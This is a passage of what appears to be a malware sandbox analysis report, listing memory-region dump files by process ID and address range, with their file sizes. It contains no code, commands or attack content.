                                                                                                        • memory/2536-286-0x00000000004C0000-0x00000000004C1000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/2536-290-0x0000000005430000-0x0000000005431000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/2536-317-0x00000000050B0000-0x00000000050C8000-memory.dmp

                                                                                                          Filesize

                                                                                                          96KB

                                                                                                        • memory/2608-315-0x000001C67AF00000-0x000001C67AF74000-memory.dmp

                                                                                                          Filesize

                                                                                                          464KB

                                                                                                        • memory/2608-340-0x000001C67A6C0000-0x000001C67A70D000-memory.dmp

                                                                                                          Filesize

                                                                                                          308KB

                                                                                                        • memory/2700-419-0x000001A0F1340000-0x000001A0F13B4000-memory.dmp

                                                                                                          Filesize

                                                                                                          464KB

                                                                                                        • memory/2708-416-0x00000152A9300000-0x00000152A9374000-memory.dmp

                                                                                                          Filesize

                                                                                                          464KB

                                                                                                        • memory/2752-302-0x0000000000120000-0x0000000000121000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/2752-324-0x00000000024B0000-0x00000000024B1000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/2752-326-0x0000000004B90000-0x0000000004B91000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/2808-237-0x0000000000C00000-0x0000000000C01000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/3684-147-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                          Filesize

                                                                                                          100KB

                                                                                                        • memory/3684-132-0x000000006B440000-0x000000006B4CF000-memory.dmp

                                                                                                          Filesize

                                                                                                          572KB

                                                                                                        • memory/3684-133-0x000000006FE40000-0x000000006FFC6000-memory.dmp

                                                                                                          Filesize

                                                                                                          1.5MB

                                                                                                        • memory/3684-134-0x000000006B280000-0x000000006B2A6000-memory.dmp

                                                                                                          Filesize

                                                                                                          152KB

                                                                                                        • memory/3684-149-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                          Filesize

                                                                                                          100KB

                                                                                                        • memory/3684-140-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                          Filesize

                                                                                                          100KB

                                                                                                        • memory/3684-144-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                          Filesize

                                                                                                          100KB

                                                                                                        • memory/3792-313-0x0000000004D3A000-0x0000000004E3B000-memory.dmp

                                                                                                          Filesize

                                                                                                          1.0MB

                                                                                                        • memory/3792-318-0x0000000003420000-0x000000000347F000-memory.dmp

                                                                                                          Filesize

                                                                                                          380KB

                                                                                                        • memory/4200-250-0x0000000000A80000-0x0000000000A81000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/4200-269-0x00000000052E0000-0x00000000052E1000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/4200-263-0x0000000002CC0000-0x0000000002CC1000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/4312-196-0x0000000004390000-0x0000000004391000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/4312-256-0x0000000007420000-0x0000000007421000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/4312-223-0x0000000007630000-0x0000000007631000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/4312-222-0x0000000006730000-0x0000000006731000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/4312-219-0x00000000073A0000-0x00000000073A1000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/4312-217-0x0000000007480000-0x0000000007481000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/4312-216-0x0000000006B80000-0x0000000006B81000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/4312-215-0x0000000006A20000-0x0000000006A21000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/4312-251-0x0000000007350000-0x0000000007351000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/4312-297-0x0000000007ED0000-0x0000000007ED1000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/4312-201-0x0000000006D00000-0x0000000006D01000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/4312-210-0x00000000066C2000-0x00000000066C3000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/4312-209-0x00000000066C0000-0x00000000066C1000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/4312-229-0x0000000007B50000-0x0000000007B51000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/4360-245-0x0000000000400000-0x000000000044D000-memory.dmp

                                                                                                          Filesize

                                                                                                          308KB

                                                                                                        • memory/4360-240-0x0000000000030000-0x0000000000039000-memory.dmp

                                                                                                          Filesize

                                                                                                          36KB

                                                                                                        • memory/4364-342-0x0000000000400000-0x0000000000414000-memory.dmp

                                                                                                          Filesize

                                                                                                          80KB

                                                                                                        • memory/4428-207-0x000000001B5A0000-0x000000001B5A2000-memory.dmp

                                                                                                          Filesize

                                                                                                          8KB

                                                                                                        • memory/4428-184-0x00000000009A0000-0x00000000009A1000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/4428-202-0x0000000002970000-0x0000000002971000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/4508-233-0x0000000000400000-0x0000000000466000-memory.dmp

                                                                                                          Filesize

                                                                                                          408KB

                                                                                                        • memory/4508-232-0x00000000005C0000-0x0000000000608000-memory.dmp

                                                                                                          Filesize

                                                                                                          288KB

                                                                                                        • memory/4516-242-0x0000000000A50000-0x0000000000B24000-memory.dmp

                                                                                                          Filesize

                                                                                                          848KB

                                                                                                        • memory/4516-244-0x0000000000400000-0x00000000004D7000-memory.dmp

                                                                                                          Filesize

                                                                                                          860KB

                                                                                                        • memory/4536-182-0x0000000000020000-0x0000000000021000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/4536-197-0x000000001AC80000-0x000000001AC82000-memory.dmp

                                                                                                          Filesize

                                                                                                          8KB

                                                                                                        • memory/4564-211-0x0000029D33330000-0x0000029D33331000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/4564-225-0x0000029D33324000-0x0000029D33325000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/4564-224-0x0000029D33322000-0x0000029D33324000-memory.dmp

                                                                                                          Filesize

                                                                                                          8KB

                                                                                                        • memory/4564-218-0x0000029D36260000-0x0000029D362DE000-memory.dmp

                                                                                                          Filesize

                                                                                                          504KB

                                                                                                        • memory/4564-226-0x0000029D33325000-0x0000029D33327000-memory.dmp

                                                                                                          Filesize

                                                                                                          8KB

                                                                                                        • memory/4564-200-0x0000029D33320000-0x0000029D33322000-memory.dmp

                                                                                                          Filesize

                                                                                                          8KB

                                                                                                        • memory/4564-192-0x0000029D18A70000-0x0000029D18A71000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/4564-205-0x0000029D18F70000-0x0000029D18F7B000-memory.dmp

                                                                                                          Filesize

                                                                                                          44KB

                                                                                                        • memory/4572-239-0x00000000013C0000-0x00000000013C2000-memory.dmp

                                                                                                          Filesize

                                                                                                          8KB

                                                                                                        • memory/4612-428-0x0000000000460000-0x000000000050E000-memory.dmp

                                                                                                          Filesize

                                                                                                          696KB

                                                                                                        • memory/4612-429-0x0000000004BC0000-0x0000000004BC1000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/4704-208-0x0000000004C70000-0x0000000004C71000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/4704-199-0x0000000000480000-0x0000000000481000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/4704-214-0x0000000005260000-0x0000000005261000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/4760-206-0x0000000000400000-0x000000000042E000-memory.dmp

                                                                                                          Filesize

                                                                                                          184KB

                                                                                                        • memory/4848-301-0x000000001B100000-0x000000001B102000-memory.dmp

                                                                                                          Filesize

                                                                                                          8KB

                                                                                                        • memory/4848-292-0x00000000005A0000-0x00000000005A1000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/4900-274-0x000000001BA50000-0x000000001BA52000-memory.dmp

                                                                                                          Filesize

                                                                                                          8KB

                                                                                                        • memory/4900-268-0x0000000002EA0000-0x0000000002EA1000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/4900-259-0x0000000000DC0000-0x0000000000DC1000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/4932-266-0x0000000000B70000-0x0000000000B71000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/4932-270-0x0000000001320000-0x0000000001322000-memory.dmp

                                                                                                          Filesize

                                                                                                          8KB

                                                                                                        • memory/4964-221-0x00000000001E0000-0x00000000001E1000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/5172-369-0x0000000077AE0000-0x0000000077C6E000-memory.dmp

                                                                                                          Filesize

                                                                                                          1.6MB

                                                                                                        • memory/5172-426-0x0000000005680000-0x0000000005681000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/5188-338-0x000001C7F6900000-0x000001C7F6974000-memory.dmp

                                                                                                          Filesize

                                                                                                          464KB

                                                                                                        • memory/5248-325-0x0000000000400000-0x0000000000422000-memory.dmp

                                                                                                          Filesize

                                                                                                          136KB

                                                                                                        • memory/5248-379-0x0000000004EB0000-0x00000000054B6000-memory.dmp

                                                                                                          Filesize

                                                                                                          6.0MB

                                                                                                        • memory/5312-345-0x00000000001E0000-0x00000000001E1000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/5524-356-0x0000000002290000-0x0000000002291000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/5804-406-0x0000000004CE0000-0x00000000052E6000-memory.dmp

                                                                                                          Filesize

                                                                                                          6.0MB

                                                                                                        • memory/5844-366-0x0000000000400000-0x0000000000414000-memory.dmp

                                                                                                          Filesize

                                                                                                          80KB

                                                                                                        • memory/6052-401-0x00000000001E0000-0x00000000001E1000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB